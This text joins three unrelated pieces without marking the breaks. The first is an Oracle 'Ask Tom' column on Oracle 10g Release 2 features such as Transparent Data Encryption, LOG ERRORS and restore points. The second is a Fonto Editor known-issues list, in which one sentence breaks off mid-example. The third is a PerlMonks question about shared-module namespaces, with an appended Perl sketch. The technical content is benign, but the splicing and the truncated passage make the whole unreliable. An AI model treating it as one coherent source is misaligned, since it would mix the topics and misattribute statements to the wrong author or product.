Now for a revolutionary feature in Oracle Database 10g Release 2: Transparent Data Encryption. This is the ability to easily and, as the name implies, transparently encrypt stored information. Authorized users need not deal with encryption keys; the data will be decrypted (and encrypted) for them quite transparently. The data is stored encrypted on-disk, so that even if someone steals your database, the information is protected. My account of my experience with Transparent Data Encryption is not intended to be a thorough "here is everything you can do" example of this new feature, but rather it shows how the feature is set up and how you would use it. The first thing I had to do was to set up a wallet. This is where the encryption keys will be stored, and this file is password-protected. For my quick-and-dirty demonstration, I simply created a directory named "wallet" off my Oracle home and put the following into my sqlnet.ora file:

WALLET_LOCATION=
  (SOURCE=(METHOD=FILE)
    (METHOD_DATA=
      (DIRECTORY=/home/ora10gr2/wallet)
    )
  )

Once that was done, all I needed to do was to open the wallet:

SQL> alter system
  2  set encryption wallet open
  3  identified by foobar;

System altered.
This is something you must do at database startup once, when you start using this feature (or else the encryption keys won't be available to the system, and therefore the encrypted data won't be available either). Now, since I had not set up any encryption keys, I needed to do that:

SQL> alter system
  2  set encryption key
  3  identified by foobar;

System altered.

In this case I let the system generate the key, but I could just as easily have specified a key of my own choice, something I might do if I wanted to move this data around from system to system easily. And that was it for setup. I was ready to store encrypted data:

SQL> create table t
  2  ( c1 varchar2(80),
  3    c2 varchar2(80) encrypt )
  4  tablespace test;

Table created.

SQL> insert into t values
  2  ( 'this_is_unencrypted',
  3    'this_is_encrypted' );

1 row created.

This data was transparently encrypted on-disk and decrypted when we queried it:

SQL> select *
  2  from t;

C1                      C2
---------------------   ---------------------
this_is_unencrypted     this_is_encrypted

How could I confirm that this data was, in fact, encrypted? I used strings and grep (a UNIX utility to search files) on the Oracle datafile to see if I could see the string. First, I made sure the block containing the encrypted data was written to disk:

SQL> alter system checkpoint;

System altered.

And then I looked for the strings. I looked for any string in the encrypt.dbf datafile that had "this_is" in it:

$ strings -a encrypt.dbf | grep this_is
this_is_unencrypted

As you can see, only the "this_is_unencrypted" string appeared. The other string was not visible because it was, in fact, scrambled before being stored. This quick example exposes the tip of the iceberg with this new encryption capability. Transparent Data Encryption works with external table unloads, data pump, and so on, and GUI tools, including Oracle Wallet Manager, let you manage your wallet and passwords. There are also commands to re-key data in the event that you feel the keys have been compromised. I believe Transparent Data Encryption is one of the more revolutionary features in Oracle Database 10g Release 2.

Next Steps

ASK Tom
Oracle Vice President Tom Kyte answers your most difficult technology questions. Highlights from that forum appear in this column.
asktom.oracle.com

READ more about Oracle Database 10g Release 2
Oracle Database 10g Release 2 New Features Guide
Transparent Data Encryption

READ more Tom
Expert Oracle: 9i and 10g Programming Techniques and Solutions

LOG ERRORS

LOG ERRORS is a new clause in DELETE, INSERT, MERGE, and UPDATE statements in Oracle Database 10g Release 2. LOG ERRORS allows a bulk statement that affects many rows to record rows that failed in processing, rather than just failing the entire statement. You can issue a statement such as INSERT INTO T SELECT A,B,C FROM T2 LOG ERRORS INTO ERRLOG('BAD_ROWS_FOR_T') REJECT LIMIT UNLIMITED. What this statement does is log into the table BAD_ROWS_FOR_T any row that violates a constraint; for example, it will log errors caused by column values that are too large, constraint violations (NOT NULL, unique, referential, and check constraints), errors raised during trigger execution, errors resulting from type conversion between a column in a subquery and the corresponding column of the table, partition mapping errors, and certain MERGE operation errors (ORA-30926: Unable to get a stable set of rows for MERGE operation). When an error occurs, the row causing the failure is logged into a "bad" table along with the Oracle error number, the text of the error message, the type of operation (INSERT, UPDATE, or DELETE), as well as the ROWID of the failed row for UPDATE and DELETE operations. This new feature is destined to be my favorite new feature of Oracle Database 10g Release 2.
Performing large bulk operations rather than row-by-row processing is superior for speed and resource usage, but error logging of failed rows has always been an issue in the past. It's no longer an issue with this new feature.

Restore Points

Oracle Database 10g Release 2 includes a new ability to create restore points. Oracle Database 10g Release 1 introduced the ability to flash back a database, but you needed to figure out the system change number (SCN) or time to flash back to. Now in Oracle Database 10g Release 2 you can CREATE RESTORE POINT "X", then do something potentially damaging, perhaps an upgrade of some application, and if the upgrade fails, you simply FLASHBACK DATABASE TO RESTORE POINT "X". You no longer have to create a SELECT statement to find the SCN and record it before flashback operations, or guess what time to flash back to.

Native XQuery Support

Oracle Database 10g Release 2 adds a native implementation of XQuery, W3C's emerging standard for querying XML. This new feature introduces two new functions, XMLQUERY and XMLTABLE. XMLQUERY gives you the ability to query Oracle XML DB repository documents or XML views over relational data using the XQuery language from a SQL client. XMLTABLE maps the result of an XQuery expression to relational rows and columns, so that result can be queried using SQL.

In Summary

That was just a quick glance at some of the new features in Oracle Database 10g Release 2. Now I'm off to read the documentation in full so I can take advantage of all the new stuff.

Send us your comments
http://www.oracle.com/technology/oramag/oracle/05-sep/o55asktom.html
Known issues

Incompatible browser extensions

Due to technical limitations, Fonto Editor is not compatible with browser extensions that modify the page, especially ones that do so to support editing. Using such extensions with Fonto Editor may cause unexpected behavior, including poor performance, sudden selection changes, being unable to move the cursor, and/or unexpected changes being made in your documents. If you encounter such issues, please check your browser's configuration and try disabling any extensions (or add-ons in Firefox) that may be interfering. We are currently aware of the following extensions causing problems when working in Fonto Editor:

- Google Input Tools
- Avaya

If you encounter other extensions that interfere with Fonto Editor or any other Fonto product, or if you are the author of an extension that is not compatible, please let us know. We always try to reach out to and work together with the extension authors to resolve compatibility issues.

Deprecation warning for createAttributeLabelWidget from the Fonto platform code

We are aware of a known issue in Fonto 7.12.0 where the deprecation warning for createAttributeLabelWidget is thrown from the platform code of Fonto. If you see the message "createAttributeLabelWidget is deprecated and will be removed in 7.14. Please use the createLabelQueryWidget instead. See Upcoming deprecations 7.14 for more information.", perform a manual search through your editor for "createAttributeLabelWidget" and replace occurrences as described in the deprecation instructions.

Moving the cursor while typing will result in misplaced content

Moving the cursor using the mouse while keeping a single character key pressed, or while typing, will result in misplaced content. Content may end up in the element that was first selected.

Find and replace does not always show its results in the expected order

Find and replace currently operates in (XML) document order instead of visual order. This affects elements such as footnotes.
Find and replace may not always scroll the result into view when the search is stopped

To always scroll the correct result into view, keep the search running; use scoped search if a full search of all documents takes too long.

Using the XQuery Update Facility in combination with element prefixes may cause elements to be created in a wrong namespace or may cause other namespace-related errors

When using XQUF to create an element in a namespace, the prefix will be used to serialize new elements to JSONML. If the prefix is not registered in the namespace configuration, these errors can occur.

Unexpected behaviour for inserting inline formatting like bold, italic, etc. when a schema contains a single element for multiple types of inline formatting

For example, when a selection starts within bold text, ends outside that bold text, and italic formatting is applied, only the non-bold part of the selected text will be italic.

Deeply nested list items can exceed the sheetframe border

Nested list items can exceed the sheetframe border after a large amount of nesting. You can avoid this by limiting the amount of sublists via the configureAsInvalid function. For example by using: configure

Please be aware that you cannot open documents with a larger list nesting than 6 in this case.

When an XPath function is defined in code and used in an XQuery module in the same package, the module/namespace/function is not found

This might result in one of the following errors:

- Error: XQST0051: No modules found with the namespace uri ...
- Function ... with arity of ... not registered. (This error can also be caused by other coding issues)

This is caused by the Fonto Editor startup order, which processes the XQuery module *.xqm files before the code (per package). In order to work around this issue, move the code to a separate package and add a dependency on the new package in the existing package.
Adding an image to a figure with an image that already has a Fonto Review comment expands the comment range

This is caused by the way positions currently work in Fonto Editor. Positions won't get lost, but just get expanded. As a workaround, use the created context modal to see the original image the comment was placed on.

When making a selection with the display scaled over 100%, the selection shown in the XML view might not match

Applicable in all supported browsers and all operating systems. This is more common on Windows machines, which have a 125% display scale by default.

Using inline formatting at the end of a sentence can cause the trailing '.' to be pushed to the next line

This is caused by the way we currently create cursor positions for the browser. The screenshots below illustrate the issue, without and with the formatting applied.

Horizontal alignment "justify" does not work

This is due to the spec allowing browsers to ignore justification when whitespace should not be collapsed, which we use in Fonto. This is noticeable in tables that have this setting.

Using iframes inside views

Using iframes inside views is highly discouraged, as iframes frequently re-render every time the view updates. This can be expensive and may affect performance. There are also known browser issues with using iframes inside views.
perlquestion prhodes

I have one script, two packages, and a module. Let's call them script.pl, pkga.pm, pkgb.pm, and common.pm.

I have a lot of code, but I've stripped out as much content as possible in order to make my question simple and non-ambiguous.

Both pkga.pm and pkgb.pm are packages in their own right (in fact they are OO packages containing methods), and start with the package keyword in order to define them as such. In each package there is just one constructor function which works absolutely fine.

This is where the trouble starts... I have common.pm, which is full of lots of useful functions that we use across our site, and I want it to be accessible from everywhere! So I've placed "use common;" within script.pl, pkga.pm, and pkgb.pm.

However, when I proceed I get an error like this:

Undefined subroutine &pkga::doit called at pkga.pm line 10.

doit is the function within common.pm that I am calling from within the constructor method in pkga.pm, although it could be any method.

It's clear that perl doesn't like to load the same module within each package, most likely related to the symbol table and keeping namespaces clean.

I have discovered a fix, by simply creating another module file as a symbolic link, e.g.

ln -s common.pm common_for_pkga.pm

and then "use common_for_pkga;" within the pkga.pm package file.

However, this seems like a crude fix, and I feel like my understanding of this entire area is unsatisfactory. I've done a lot of Google and Monks searches but haven't been able to find a deeper explanation, fix, or workaround.

This perl disciple/fan would appreciate any help or pointers. Thanks in advance. Peter.
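For context, here is a minimal sketch of the conventional module layout that avoids this class of error. The file names match the question; the diagnosis (common.pm lacking its own package declaration, so its subs are compiled into the first loader's namespace and the cached second "use" is a no-op) is an assumption based on the symptoms described, not something confirmed in the post:

```perl
# --- common.pm ---
# If common.pm has no "package" statement, its subs land in the namespace of
# whichever package happens to compile it first. Because use/require cache by
# filename (%INC), the second "use common;" loads nothing, which matches the
# "Undefined subroutine &pkga::doit" symptom and explains why the symlink
# trick (a new filename forces a recompile) appears to work.
package common;
use strict;
use warnings;
use Exporter 'import';
our @EXPORT_OK = qw(doit);    # export on request only, keeping namespaces clean

sub doit {
    return "did it";
}

1;    # a module must end with a true value

# --- pkga.pm ---
package pkga;
use strict;
use warnings;
use common qw(doit);    # imports doit() into pkga's namespace

sub new {
    my $class = shift;
    my $self  = bless {}, $class;
    doit();               # now resolves via the import; common::doit() also works
    return $self;
}

1;
```

With this layout every package can "use common" independently; alternatively, skip the import list entirely and call the function fully qualified as common::doit().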